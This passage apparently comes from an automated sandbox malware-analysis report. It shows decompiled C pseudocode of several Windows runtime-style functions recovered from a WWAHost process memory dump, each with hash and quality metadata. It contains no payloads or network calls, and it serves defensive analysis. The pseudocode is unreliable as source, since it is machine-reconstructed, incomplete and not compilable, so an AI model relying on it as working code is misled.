                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                              						}
                                              						_t9 = _t52 + 8; // 0x11
                                              						 *0x3a47b14 = _t50;
                                              						_t48 = _v12;
                                              						 *0x3a47b10 = _t9;
                                              						goto L6;
                                              					}
                                              					 *0x3a47b10 = _t37 + 8;
                                              					goto L6;
                                              				}
                                              				 *__ecx = _t17;
                                              				 *_t33 = 0;
                                              				goto L3;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 165b74e1cfce56ba194ff6404100bac1e7580a5c1d61f9c4fb6c47321d69fbb5
                                              • Instruction ID: e117b78cb3cf543aa21cfb6dbf4ab2a8702c042812b9b941c688fcf77c1ddf0e
                                              • Opcode Fuzzy Hash: 165b74e1cfce56ba194ff6404100bac1e7580a5c1d61f9c4fb6c47321d69fbb5
                                              • Instruction Fuzzy Hash: 6231CEB9A00680AFC711EF08D880F29B7F9FBC4790F144D5AE0268B244D373A903CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E0395AA16(signed short* __ecx) {
                                              				signed int _v8;
                                              				intOrPtr _v12;
                                              				signed short _v16;
                                              				intOrPtr _v20;
                                              				signed short _v24;
                                              				signed short _v28;
                                              				void* _v32;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr _t25;
                                              				signed short _t38;
                                              				signed short* _t42;
                                              				signed int _t44;
                                              				signed short* _t52;
                                              				signed short _t53;
                                              				signed int _t54;
                                              
                                              				_v8 =  *0x3a4d360 ^ _t54;
                                              				_t42 = __ecx;
                                              				_t44 =  *__ecx & 0x0000ffff;
                                              				_t52 =  &(__ecx[2]);
                                              				_t51 = _t44 + 2;
                                              				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                              					L4:
                                              					_t25 =  *0x3a47b9c; // 0x0
                                              					_t53 = L03974620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                              					__eflags = _t53;
                                              					if(_t53 == 0) {
                                              						L3:
                                              						return E0399B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                              					} else {
                                              						E0399F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                              						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                              						L2:
                                              						_t51 = 4;
                                              						if(L03966C59(_t53, _t51, _t58) != 0) {
                                              							_t28 = E03985E50(0x393c338, 0, 0,  &_v32);
                                              							__eflags = _t28;
                                              							if(_t28 == 0) {
                                              								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                              								__eflags = _t38;
                                              								_v24 = _t53;
                                              								_v16 = _t38;
                                              								_v20 = 0;
                                              								_v12 = 0;
                                              								E0398B230(_v32, _v28, 0x393c2d8, 1,  &_v24);
                                              								_t28 = E0395F7A0(_v32, _v28);
                                              							}
                                              							__eflags = _t53 -  *_t52;
                                              							if(_t53 !=  *_t52) {
                                              								_t28 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                              							}
                                              						}
                                              						goto L3;
                                              					}
                                              				}
                                              				_t53 =  *_t52;
                                              				_t44 = _t44 >> 1;
                                              				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                              				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                              					goto L4;
                                              				}
                                              				goto L2;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e6d82f59eaa7e294366abbae5d6704c73e15124d2e17562d6aa5cf95fd3d2a2d
                                              • Instruction ID: 10003f16dc47fdad7946271eaade171a88759a0ba521ef6116d4676c10d5bd0a
                                              • Opcode Fuzzy Hash: e6d82f59eaa7e294366abbae5d6704c73e15124d2e17562d6aa5cf95fd3d2a2d
                                              • Instruction Fuzzy Hash: F03105B1A00219AFDF11EF69CD41ABFB3B9EF84700F040469F901EB150E7349951DBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 97%
                                              			E039861A0(signed int* __ecx) {
                                              				intOrPtr _v8;
                                              				char _v12;
                                              				intOrPtr* _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _t30;
                                              				intOrPtr _t31;
                                              				void* _t32;
                                              				intOrPtr _t33;
                                              				intOrPtr _t37;
                                              				intOrPtr _t49;
                                              				signed int _t51;
                                              				intOrPtr _t52;
                                              				signed int _t54;
                                              				void* _t59;
                                              				signed int* _t61;
                                              				intOrPtr* _t64;
                                              
                                              				_t61 = __ecx;
                                              				_v12 = 0;
                                              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                              				_v16 = __ecx;
                                              				_v8 = 0;
                                              				if(_t30 == 0) {
                                              					L6:
                                              					_t31 = 0;
                                              					L7:
                                              					return _t31;
                                              				}
                                              				_t32 = _t30 + 0x5d8;
                                              				if(_t32 == 0) {
                                              					goto L6;
                                              				}
                                              				_t59 = _t32 + 0x30;
                                              				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                              					goto L6;
                                              				}
                                              				if(__ecx != 0) {
                                              					 *((intOrPtr*)(__ecx)) = 0;
                                              					 *((intOrPtr*)(__ecx + 4)) = 0;
                                              				}
                                              				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                              					_t51 =  *(_t32 + 0x10);
                                              					_t33 = _t32 + 0x10;
                                              					_v20 = _t33;
                                              					_t54 =  *(_t33 + 4);
                                              					if((_t51 | _t54) == 0) {
                                              						_t37 = E03985E50(0x39367cc, 0, 0,  &_v12);
                                              						if(_t37 != 0) {
                                              							goto L6;
                                              						}
                                              						_t52 = _v8;
                                              						asm("lock cmpxchg8b [esi]");
                                              						_t64 = _v16;
                                              						_t49 = _t37;
                                              						_v20 = 0;
                                              						if(_t37 == 0) {
                                              							if(_t64 != 0) {
                                              								 *_t64 = _v12;
                                              								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                              							}
                                              							E03A29D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                              							_t31 = 1;
                                              							goto L7;
                                              						}
                                              						E0395F7C0(_t52, _v12, _t52, 0);
                                              						if(_t64 != 0) {
                                              							 *_t64 = _t49;
                                              							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                              						}
                                              						L12:
                                              						_t31 = 1;
                                              						goto L7;
                                              					}
                                              					if(_t61 != 0) {
                                              						 *_t61 = _t51;
                                              						_t61[1] = _t54;
                                              					}
                                              					goto L12;
                                              				} else {
                                              					goto L6;
                                              				}
                                              			}




















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4d68f71f3e01f129d86d7a37b464decabda44215d6a4e68283d7c2c9e1d68c8
                                              • Instruction ID: d1ccff3a92ec8a4968c528416dae9d4f30655e3e3c12a28bb8c1c09e101a6b46
                                              • Opcode Fuzzy Hash: b4d68f71f3e01f129d86d7a37b464decabda44215d6a4e68283d7c2c9e1d68c8
                                              • Instruction Fuzzy Hash: 7F316B726157418FD360EF5DC940B26F7E8FB88B40F09496DE9949B352D770E804CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E03994A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				signed int* _v12;
                                              				char _v13;
                                              				signed int _v16;
                                              				char _v21;
                                              				signed int* _v24;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t29;
                                              				signed int* _t32;
                                              				signed int* _t41;
                                              				signed int _t42;
                                              				void* _t43;
                                              				intOrPtr* _t51;
                                              				void* _t52;
                                              				signed int _t53;
                                              				signed int _t58;
                                              				void* _t59;
                                              				signed int _t60;
                                              				signed int _t62;
                                              
                                              				_t49 = __edx;
                                              				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                              				_t26 =  *0x3a4d360 ^ _t62;
                                              				_v8 =  *0x3a4d360 ^ _t62;
                                              				_t41 = __ecx;
                                              				_t51 = __edx;
                                              				_v12 = __ecx;
                                              				if(_a4 == 0) {
                                              					if(_a8 != 0) {
                                              						goto L1;
                                              					}
                                              					_v13 = 1;
                                              					E03972280(_t26, 0x3a48608);
                                              					_t58 =  *_t41;
                                              					if(_t58 == 0) {
                                              						L11:
                                              						E0396FFB0(_t41, _t51, 0x3a48608);
                                              						L2:
                                              						 *0x3a4b1e0(_a4, _a8);
                                              						_t42 =  *_t51();
                                              						if(_t42 == 0) {
                                              							_t29 = 0;
                                              							L5:
                                              							_pop(_t52);
                                              							_pop(_t59);
                                              							_pop(_t43);
                                              							return E0399B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                              						}
                                              						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                              						if(_v21 != 0) {
                                              							_t53 = 0;
                                              							E03972280(_t28, 0x3a48608);
                                              							_t32 = _v24;
                                              							if( *_t32 == _t58) {
                                              								 *_t32 = _t42;
                                              								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                              								if(_t58 != 0) {
                                              									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                              									asm("sbb edi, edi");
                                              									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                              								}
                                              							}
                                              							E0396FFB0(_t42, _t53, 0x3a48608);
                                              							if(_t53 != 0) {
                                              								L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                              							}
                                              						}
                                              						_t29 = _t42;
                                              						goto L5;
                                              					}
                                              					if( *((char*)(_t58 + 0x40)) != 0) {
                                              						L10:
                                              						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                              						E0396FFB0(_t41, _t51, 0x3a48608);
                                              						_t29 = _t58;
                                              						goto L5;
                                              					}
                                              					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                              					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                              						goto L11;
                                              					}
                                              					goto L10;
                                              				}
                                              				L1:
                                              				_v13 = 0;
                                              				_t58 = 0;
                                              				goto L2;
                                              			}

























                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5e5cd1301ed3b2cd10d335491722ae015b77a438647e2784f6487ce9d64207f0
                                              • Instruction ID: e88c45d31756486d40a85bf14d0e12cae7f9088f67e627ef6a6d85e707f71c0a
                                              • Opcode Fuzzy Hash: 5e5cd1301ed3b2cd10d335491722ae015b77a438647e2784f6487ce9d64207f0
                                              • Instruction Fuzzy Hash: 2C3104362023549FEB22DF5DC941B2AFBADFFC1750F44496AE4560B241C774D802CB86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E03998EC7(void* __ecx, void* __edx) {
                                              				signed int _v8;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				char* _v28;
                                              				intOrPtr _v32;
                                              				intOrPtr _v36;
                                              				intOrPtr _v40;
                                              				signed int* _v44;
                                              				intOrPtr _v48;
                                              				intOrPtr _v52;
                                              				intOrPtr _v56;
                                              				signed int* _v60;
                                              				intOrPtr _v64;
                                              				intOrPtr _v68;
                                              				intOrPtr _v72;
                                              				char* _v76;
                                              				intOrPtr _v80;
                                              				signed int _v84;
                                              				intOrPtr _v88;
                                              				intOrPtr _v92;
                                              				intOrPtr _v96;
                                              				intOrPtr _v100;
                                              				intOrPtr _v104;
                                              				signed int* _v108;
                                              				char _v140;
                                              				signed int _v144;
                                              				signed int _v148;
                                              				intOrPtr _v152;
                                              				char _v156;
                                              				intOrPtr _v160;
                                              				char _v164;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* _t67;
                                              				intOrPtr _t70;
                                              				void* _t71;
                                              				void* _t72;
                                              				signed int _t73;
                                              
                                              				_t69 = __edx;
                                              				_v8 =  *0x3a4d360 ^ _t73;
                                              				_t48 =  *[fs:0x30];
                                              				_t72 = __edx;
                                              				_t71 = __ecx;
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                              					_t48 = E03984E70(0x3a486e4, 0x3999490, 0, 0);
                                              					if( *0x3a453e8 > 5 && E03998F33(0x3a453e8, 0, 0x2000) != 0) {
                                              						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                              						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                              						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                              						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                              						_v108 =  &_v84;
                                              						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                              						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                              						_v76 =  &_v156;
                                              						_t70 = 8;
                                              						_v60 =  &_v144;
                                              						_t67 = 4;
                                              						_v44 =  &_v148;
                                              						_v152 = 0;
                                              						_v160 = 0;
                                              						_v104 = 0;
                                              						_v100 = 2;
                                              						_v96 = 0;
                                              						_v88 = 0;
                                              						_v80 = 0;
                                              						_v72 = 0;
                                              						_v68 = _t70;
                                              						_v64 = 0;
                                              						_v56 = 0;
                                              						_v52 = 0x3a453e8;
                                              						_v48 = 0;
                                              						_v40 = 0;
                                              						_v36 = 0x3a453e8;
                                              						_v32 = 0;
                                              						_v28 =  &_v164;
                                              						_v24 = 0;
                                              						_v20 = _t70;
                                              						_v16 = 0;
                                              						_t69 = 0x393bc46;
                                              						_t48 = E039D7B9C(0x3a453e8, 0x393bc46, _t67, 0x3a453e8, _t70,  &_v140);
                                              					}
                                              				}
                                              				return E0399B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                              			}












































                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f672da355c108eb331eb0717685cf5ad4119bfc376406e33e2ed37fe30a73389
                                              • Instruction ID: 4e048d32ba46716608a78e1a5aa39edec3c10a0eeb55ca0ff99604c6d5f2f0bc
                                              • Opcode Fuzzy Hash: f672da355c108eb331eb0717685cf5ad4119bfc376406e33e2ed37fe30a73389
                                              • Instruction Fuzzy Hash: 6C419FB5D003189EDB60CFAAD981AADFBF8FB89710F5041AFE509A7200E7745A44CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 74%
                                              			E0398E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                              				intOrPtr* _v0;
                                              				signed char _v4;
                                              				signed int _v8;
                                              				void* __ecx;
                                              				void* __ebp;
                                              				void* _t37;
                                              				intOrPtr _t38;
                                              				signed int _t44;
                                              				signed char _t52;
                                              				void* _t54;
                                              				intOrPtr* _t56;
                                              				void* _t58;
                                              				char* _t59;
                                              				signed int _t62;
                                              
                                              				_t58 = __edx;
                                              				_push(0);
                                              				_push(4);
                                              				_push( &_v8);
                                              				_push(0x24);
                                              				_push(0xffffffff);
                                              				if(E03999670() < 0) {
                                              					L039ADF30(_t54, _t58, _t35);
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					_push(_t54);
                                              					_t52 = _v4;
                                              					if(_t52 > 8) {
                                              						_t37 = 0xc0000078;
                                              					} else {
                                              						_t38 =  *0x3a47b9c; // 0x0
                                              						_t62 = _t52 & 0x000000ff;
                                              						_t59 = L03974620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                              						if(_t59 == 0) {
                                              							_t37 = 0xc0000017;
                                              						} else {
                                              							_t56 = _v0;
                                              							 *(_t59 + 1) = _t52;
                                              							 *_t59 = 1;
                                              							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                              							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                              							_t44 = _t62 - 1;
                                              							if(_t44 <= 7) {
                                              								switch( *((intOrPtr*)(_t44 * 4 +  &M0398E810))) {
                                              									case 0:
                                              										L6:
                                              										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                              										goto L7;
                                              									case 1:
                                              										L13:
                                              										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                              										goto L6;
                                              									case 2:
                                              										L12:
                                              										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                              										goto L13;
                                              									case 3:
                                              										L11:
                                              										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                              										goto L12;
                                              									case 4:
                                              										L10:
                                              										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                              										goto L11;
                                              									case 5:
                                              										L9:
                                              										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                              										goto L10;
                                              									case 6:
                                              										L17:
                                              										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                              										goto L9;
                                              									case 7:
                                              										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                              										goto L17;
                                              								}
                                              							}
                                              							L7:
                                              							 *_a40 = _t59;
                                              							_t37 = 0;
                                              						}
                                              					}
                                              					return _t37;
                                              				} else {
                                              					_push(0x20);
                                              					asm("ror eax, cl");
                                              					return _a4 ^ _v8;
                                              				}
                                              			}


















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca9e62ef741a19730c28ffc68f827e194b0585772d7fd24a3c98decd394b4a16
                                              • Instruction ID: e5af58353461fc506b77dafe29da4d047b749131d36c75780c3483b97054f261
                                              • Opcode Fuzzy Hash: ca9e62ef741a19730c28ffc68f827e194b0585772d7fd24a3c98decd394b4a16
                                              • Instruction Fuzzy Hash: CE318D75A14249EFD704DF18C851B9AB7E8FB49310F14865AF904CB341D731EC80CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 67%
                                              			E0398BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				void* __ebx;
                                              				void* __edi;
                                              				intOrPtr _t22;
                                              				intOrPtr* _t41;
                                              				intOrPtr _t51;
                                              
                                              				_t51 =  *0x3a46100; // 0x1d
                                              				_v12 = __edx;
                                              				_v8 = __ecx;
                                              				if(_t51 >= 0x800) {
                                              					L12:
                                              					return 0;
                                              				} else {
                                              					goto L1;
                                              				}
                                              				while(1) {
                                              					L1:
                                              					_t22 = _t51;
                                              					asm("lock cmpxchg [ecx], edx");
                                              					if(_t51 == _t22) {
                                              						break;
                                              					}
                                              					_t51 = _t22;
                                              					if(_t22 < 0x800) {
                                              						continue;
                                              					}
                                              					goto L12;
                                              				}
                                              				E03972280(0xd, 0x1235f1a0);
                                              				_t41 =  *0x3a460f8; // 0x0
                                              				if(_t41 != 0) {
                                              					 *0x3a460f8 =  *_t41;
                                              					 *0x3a460fc =  *0x3a460fc + 0xffff;
                                              				}
                                              				E0396FFB0(_t41, 0x800, 0x1235f1a0);
                                              				if(_t41 != 0) {
                                              					L6:
                                              					asm("movsd");
                                              					asm("movsd");
                                              					asm("movsd");
                                              					asm("movsd");
                                              					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                              					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                              					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                              					do {
                                              						asm("lock xadd [0x3a460f0], ax");
                                              						 *((short*)(_t41 + 0x34)) = 1;
                                              					} while (1 == 0);
                                              					goto L8;
                                              				} else {
                                              					_t41 = L03974620(0x3a46100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                              					if(_t41 == 0) {
                                              						L11:
                                              						asm("lock dec dword [0x3a46100]");
                                              						L8:
                                              						return _t41;
                                              					}
                                              					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                              					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                              					if(_t41 == 0) {
                                              						goto L11;
                                              					}
                                              					goto L6;
                                              				}
                                              			}











                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f3865226939d81e00e21852c8514304f85bd20caa749edb25d5ad9c78ee6d22a
                                              • Instruction ID: 3f812db43298eb71840efded18376c3e8ee3a3e41a24eaa9fa077668326603b0
                                              • Opcode Fuzzy Hash: f3865226939d81e00e21852c8514304f85bd20caa749edb25d5ad9c78ee6d22a
                                              • Instruction Fuzzy Hash: 7B31F07AA00616EBCB11FF58D4807A673A8FFD9314F084479ED48DB205EB75D90ACB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 76%
                                              			E03959100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                              				signed int _t53;
                                              				signed int _t56;
                                              				signed int* _t60;
                                              				signed int _t63;
                                              				signed int _t66;
                                              				signed int _t69;
                                              				void* _t70;
                                              				intOrPtr* _t72;
                                              				void* _t78;
                                              				void* _t79;
                                              				signed int _t80;
                                              				intOrPtr _t82;
                                              				void* _t85;
                                              				void* _t88;
                                              				void* _t89;
                                              
                                              				_t84 = __esi;
                                              				_t70 = __ecx;
                                              				_t68 = __ebx;
                                              				_push(0x2c);
                                              				_push(0x3a2f6e8);
                                              				E039AD0E8(__ebx, __edi, __esi);
                                              				 *((char*)(_t85 - 0x1d)) = 0;
                                              				_t82 =  *((intOrPtr*)(_t85 + 8));
                                              				if(_t82 == 0) {
                                              					L4:
                                              					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                              						E03A288F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                              					}
                                              					L5:
                                              					return E039AD130(_t68, _t82, _t84);
                                              				}
                                              				_t88 = _t82 -  *0x3a486c0; // 0xb507b0
                                              				if(_t88 == 0) {
                                              					goto L4;
                                              				}
                                              				_t89 = _t82 -  *0x3a486b8; // 0x0
                                              				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                              					goto L4;
                                              				} else {
                                              					E03972280(_t82 + 0xe0, _t82 + 0xe0);
                                              					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                              					__eflags =  *((char*)(_t82 + 0xe5));
                                              					if(__eflags != 0) {
                                              						E03A288F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                              						goto L12;
                                              					} else {
                                              						__eflags =  *((char*)(_t82 + 0xe4));
                                              						if( *((char*)(_t82 + 0xe4)) == 0) {
                                              							 *((char*)(_t82 + 0xe4)) = 1;
                                              							_push(_t82);
                                              							_push( *((intOrPtr*)(_t82 + 0x24)));
                                              							E0399AFD0();
                                              						}
                                              						while(1) {
                                              							_t60 = _t82 + 8;
                                              							 *(_t85 - 0x2c) = _t60;
                                              							_t68 =  *_t60;
                                              							_t80 = _t60[1];
                                              							 *(_t85 - 0x28) = _t68;
                                              							 *(_t85 - 0x24) = _t80;
                                              							while(1) {
                                              								L10:
                                              								__eflags = _t80;
                                              								if(_t80 == 0) {
                                              									break;
                                              								}
                                              								_t84 = _t68;
                                              								 *(_t85 - 0x30) = _t80;
                                              								 *(_t85 - 0x24) = _t80 - 1;
                                              								asm("lock cmpxchg8b [edi]");
                                              								_t68 = _t84;
                                              								 *(_t85 - 0x28) = _t68;
                                              								 *(_t85 - 0x24) = _t80;
                                              								__eflags = _t68 - _t84;
                                              								_t82 =  *((intOrPtr*)(_t85 + 8));
                                              								if(_t68 != _t84) {
                                              									continue;
                                              								}
                                              								__eflags = _t80 -  *(_t85 - 0x30);
                                              								if(_t80 !=  *(_t85 - 0x30)) {
                                              									continue;
                                              								}
                                              								__eflags = _t80;
                                              								if(_t80 == 0) {
                                              									break;
                                              								}
                                              								_t63 = 0;
                                              								 *(_t85 - 0x34) = 0;
                                              								_t84 = 0;
                                              								__eflags = 0;
                                              								while(1) {
                                              									 *(_t85 - 0x3c) = _t84;
                                              									__eflags = _t84 - 3;
                                              									if(_t84 >= 3) {
                                              										break;
                                              									}
                                              									__eflags = _t63;
                                              									if(_t63 != 0) {
                                              										L40:
                                              										_t84 =  *_t63;
                                              										__eflags = _t84;
                                              										if(_t84 != 0) {
                                              											_t84 =  *(_t84 + 4);
                                              											__eflags = _t84;
                                              											if(_t84 != 0) {
                                              												 *0x3a4b1e0(_t63, _t82);
                                              												 *_t84();
                                              											}
                                              										}
                                              										do {
                                              											_t60 = _t82 + 8;
                                              											 *(_t85 - 0x2c) = _t60;
                                              											_t68 =  *_t60;
                                              											_t80 = _t60[1];
                                              											 *(_t85 - 0x28) = _t68;
                                              											 *(_t85 - 0x24) = _t80;
                                              											goto L10;
                                              										} while (_t63 == 0);
                                              										goto L40;
                                              									}
                                              									_t69 = 0;
                                              									__eflags = 0;
                                              									while(1) {
                                              										 *(_t85 - 0x38) = _t69;
                                              										__eflags = _t69 -  *0x3a484c0;
                                              										if(_t69 >=  *0x3a484c0) {
                                              											break;
                                              										}
                                              										__eflags = _t63;
                                              										if(_t63 != 0) {
                                              											break;
                                              										}
                                              										_t66 = E03A29063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                              										__eflags = _t66;
                                              										if(_t66 == 0) {
                                              											_t63 = 0;
                                              											__eflags = 0;
                                              										} else {
                                              											_t63 = _t66 + 0xfffffff4;
                                              										}
                                              										 *(_t85 - 0x34) = _t63;
                                              										_t69 = _t69 + 1;
                                              									}
                                              									_t84 = _t84 + 1;
                                              								}
                                              								__eflags = _t63;
                                              							}
                                              							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                              							 *((char*)(_t82 + 0xe5)) = 1;
                                              							 *((char*)(_t85 - 0x1d)) = 1;
                                              							L12:
                                              							 *(_t85 - 4) = 0xfffffffe;
                                              							E0395922A(_t82);
                                              							_t53 = E03977D50();
                                              							__eflags = _t53;
                                              							if(_t53 != 0) {
